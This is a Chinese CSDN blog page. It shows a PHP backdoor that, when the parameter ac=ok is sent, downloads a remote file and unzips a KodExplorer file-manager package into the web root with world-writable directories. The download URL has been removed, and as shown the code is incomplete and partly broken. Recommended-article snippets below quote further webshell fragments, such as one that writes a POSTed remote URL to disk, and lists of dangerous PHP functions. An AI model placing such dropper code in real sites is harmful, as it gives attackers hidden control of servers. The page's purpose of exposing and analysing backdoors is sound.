php 后门代码_分析一段PHP的后门代码,很恶心

最新推荐文章于 2024-02-03 15:19:32 发布
最新推荐文章于 2024-02-03 15:19:32 发布
阅读量244 收藏
点赞数
文章标签: php 后门代码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35936375/article/details/115108427
版权

[PHP] 纯文本查看 复制代码if($_GET['ac']=="ok"){ echo 'OK';

function downFile($url,$path){

$arr=parse_url($url);

$fileName=basename($arr['path']);

$file=file_get_contents($url);

}

downFile("这里是网络下载地址,防止小人,直接删除这里的连接");

class Unzip{

public function __construct(){

header("content-type:text/html;charset=utf8");

}

public function unzip($src_file, $dest_dir=false, $create_zip_name_dir=true, $overwrite=true){

if ($zip = zip_open($src_file)){

if ($zip){

$splitter = ($create_zip_name_dir === true) ? "." : "/";

if($dest_dir === false){

}

$this->create_dirs($dest_dir);

while ($zip_entry = zip_read($zip)){

$pos_last_slash = strrpos(zip_entry_name($zip_entry), "/");

if ($pos_last_slash !== false){

$this->create_dirs($dest_dir.substr(zip_entry_name($zip_entry), 0, $pos_last_slash+1));

}

if (zip_entry_open($zip,$zip_entry,"r")){

$file_name = $dest_dir.zip_entry_name($zip_entry);

if ($overwrite === true || $overwrite === false && !is_file($file_name)){

$fstream = zip_entry_read($zip_entry, zip_entry_filesize($zip_entry));

}

zip_entry_close($zip_entry);

}

}

zip_close($zip);

}

}else{

return false;

}

return true;

}

public function create_dirs($path){

if (!is_dir($path)){

$directory_path = "";

$directories = explode("/",$path);

array_pop($directories);

foreach($directories as $directory){

$directory_path .= $directory."/";

if (!is_dir($directory_path)){

mkdir($directory_path);

chmod($directory_path, 0777);

}

}

}

}

}

$z = new Unzip();

$z->unzip("kodexplorer4.39.zip",'./', true, false);

}

牛毛细雨润无声
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一个不易被发现的PHP后门代码解析
10-25
主要介绍了一个不易被发现的PHP后门代码解析,对于网络安全来说非常重要,需要的朋友可以参考下
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
php植入后门,网站被植入后门代码
weixin_36139228的博客
03-18 443
郎朗坤error_reporting(0);if($_GET['act'] == 'dl'){echo ('FN:URL:');if($_SERVER['REQUEST_METHOD'] == 'POST'){file_put_contents($_POST['fn'], file_get_contents($_POST['url']));}exit;}if($_GET['act'] == 'ul...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 556
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
防止外包不给钱 php,PHP外包简易加密后门
weixin_33225622的博客
03-10 507
1、首先将后门代码加密,得到加密后的代码。$encode=<<if(!file_exists(dirname(dirname(dirname(__FILE__))).'/blog.51cto.com.chinaleo')){header('Location:http://blog.51cto.com/chinaleo');exit();}EOF;echobase64_encod...
php变量函数后门,项目实战 | 记一次对某猥琐PHP后门的爆菊
weixin_39814482的博客
03-12 547
最近遇到个文件,打开一看只有几行注释?看了下字节数却很大,横向进度条很长啊,通过web访问是空白,看上去应该是藏了后门了。ps:这种方式遇到粗心/没有经验的管理员可能混过去,但若使用win自带的记事本(需开启自动换行)则一览无余。实际上换行整理一下:用Notepad++自带的正则替换简单做了下格式处理。另外在下面的代码中发现了eval/*r49557ec*/(还插了注释,这个小方法很有意思,测试...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1130
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
新型ASP后门代码分析
10-31
ASP后门代码分析 本篇文章将对新型ASP后门代码进行深入分析,以帮助读者更好地理解 ASP 后门的工作原理和检测方法。 一、ASP 后门简介 ASP 后门是一种恶意代码,旨在通过 Web 应用程序来控制感染的计算机。...
php实现批量查询清除一句话后门代码
10-30
一句话后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句话后门代码,大家可以省去不少麻烦了
php简单后门实现及php连接数据库
qq_58683895的博客
10-24 926
包含php简单后门的实现代码及操作,以及php连接数据库的操作代码及介绍,和相关php函数的介绍
PHP后门PHP后门的集合。 仅用于教育或测试目的
02-05
PHP后门 PHP后门的集合。 仅用于教育和/或测试目的。 笔记 不一定包含您可以在反找到的后门的反混淆的版本。 要对这些技巧和其他技巧进行模糊处理,请查看“ 部分。 始终在安全的环境中调查恶意软件。 这意味着:与您的网络分开并在虚拟机中! 某些后门可能是后门的(是的,确实) 。 永远不要将其用于任何恶意目的。 后门遵循以下格式: Backdoorname_SHA1.php后门的名称是已知的。 PHP工具 这包括指向以下工具的链接: 反混淆器(在线和离线) 美化工具(在线和离线) 测试人员(运行代码-在安全的环境中执行此操作!) 直接从访问这些工具的链接。 其他回购 这是一个
PHP后门
qq_39751956的博客
07-08 246
简单的后门解析,密文都会明确以下方法,说白了就是字符串下标字符拼接//$c(原文经过strtr置换后的密文,由 目标字符+替换字符+base64_encode(‘原文内容’)构成)//strtr//substr//52(这个值不一定)//urldecode解析过的字符串提示:以下是本篇文章正文内容,下面案例仅供参考。
多种php后门
xxx9686的博客
09-25 441
代码】多种php后门
什么是后门
w18842156489的博客
05-19 666
通常指那些绕过安全性控制而获取对程序或系统访问权的程序方法。 在软件的开发阶段,程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。
php自动生成后门代码,PHP常见代码执行后门函数
最新发布
xcdm100的博客
02-03 568
应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。,按照 php的格式,表达式在两个/之间,如果在表达式末尾加上一个 e,则第二个参数就会被当做 php代码执行。call_user_func_array(): 方法同上,只是第二个参数要是一个数组,作为第一个参数的参数。函数的第一个参数是被调动的函数,剩下的参数(可有多个参数)是被调用函数的参数。调用回调函数,并把一个数组参数作为回调函数的参数。为数组的每个元素应用回调函数。
php超强后门在任意位置创建文件,web后门 那些强悍猥琐流的PHP一句话后门大全分享...
weixin_36094492的博客
03-09 464
强悍的PHP一句话后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马:复制代码代码如下:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replac...
php nginx func_PHP常见代码执行后门函数(示例代码)
weixin_39943547的博客
03-08 152
PHP常见代码执行后门函数代码执行:应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。常见php代码执行函数介绍常用执行代码函数1、eval():eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样3、preg_replace():preg_replace 函数一个参数是一个正则表达式,...
php后门木马常用命令分析与防范
主题模板站的博客
01-21 716
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
PHP大马后门分析
qq_17754023的博客
02-28 4026
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
使用PHP写一个后门监控代码
02-21
我不熟悉PHP,但是我可以尝试给你一些建议:1.熟悉PHP语言基础;2.研究不同类型的后门...3.尝试编写一个简单的后门代码;4.了解有关安全合规的相关知识;5.熟悉文件处理,以及相关的安全流程。希望我的建议能帮到你。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值